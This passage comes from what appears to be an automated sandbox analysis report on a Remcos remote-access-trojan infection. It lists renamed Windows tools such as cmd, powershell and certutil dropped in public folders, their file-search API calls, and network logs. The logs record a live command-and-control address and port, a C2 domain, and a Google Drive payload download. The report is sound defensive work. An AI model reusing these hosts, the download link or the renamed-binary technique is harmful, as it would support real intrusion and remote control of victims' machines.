00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF789BE7B4C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF789BE7B4C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,25_2_00007FF67DEB5E58
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose,25_2_00007FF67DF119F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,25_2_00007FF67DEBDBC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,25_2_00007FF67DF11B04
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,25_2_00007FF67DEF3674
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,25_2_00007FF67DEBD4A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE7D440
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,25_2_00007FF67DEBB3D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,25_2_00007FF67DF16F80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF110C4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,25_2_00007FF67DF13100
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,25_2_00007FF67DEAC6F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,25_2_00007FF67DF1234C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_1B9FBB30
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_1B9FC34D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_1BA0C291
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA09AF5 FindFirstFileW,28_2_1BA09AF5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose,28_2_1B9F880C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F783C FindFirstFileW,FindNextFileW,28_2_1B9F783C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_1B9F9665
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_1B9FBD37
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA3E879 FindFirstFileExA,28_2_1BA3E879
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,29_2_00007FF789BD823C
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,29_2_00007FF789BD2978
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,29_2_00007FF789BC35B8
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,29_2_00007FF789BC1560
                    Source: C:\Users\Public\alpha.exeCode function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose,29_2_00007FF789BE7B4C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,36_2_029A5878
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,36_2_2106C34D
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069253
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,36_2_2107C291
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,36_2_21069665
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,36_2_2106880C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106783C FindFirstFileW,FindNextFileW,36_2_2106783C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210AE879 FindFirstFileExA,36_2_210AE879
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,36_2_2106BB30
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW,36_2_21079AF5
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,36_2_2106BD37
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,36_2_21067C97

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49730 -> 83.137.157.85:9231
                    Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 83.137.157.85:9231 -> 192.168.2.5:49730
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: ^www.pentegrasystem.com
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028AC78C InternetCheckConnectionA,28_2_028AC78C
                    Source: global trafficTCP traffic: 192.168.2.5:49730 -> 83.137.157.85:9231
                    Source: global trafficHTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: INVITECHHU INVITECHHU
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.35.153.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F4B96 WaitForSingleObject,SetEvent,recv,28_2_1B9F4B96
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
                    Source: global trafficHTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: drive.google.com
                    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                    Source: global trafficDNS traffic detected: DNS query: www.pentegrasystem.com
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 26Date: Fri, 26 Apr 2024 19:56:05 GMTConnection: close
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
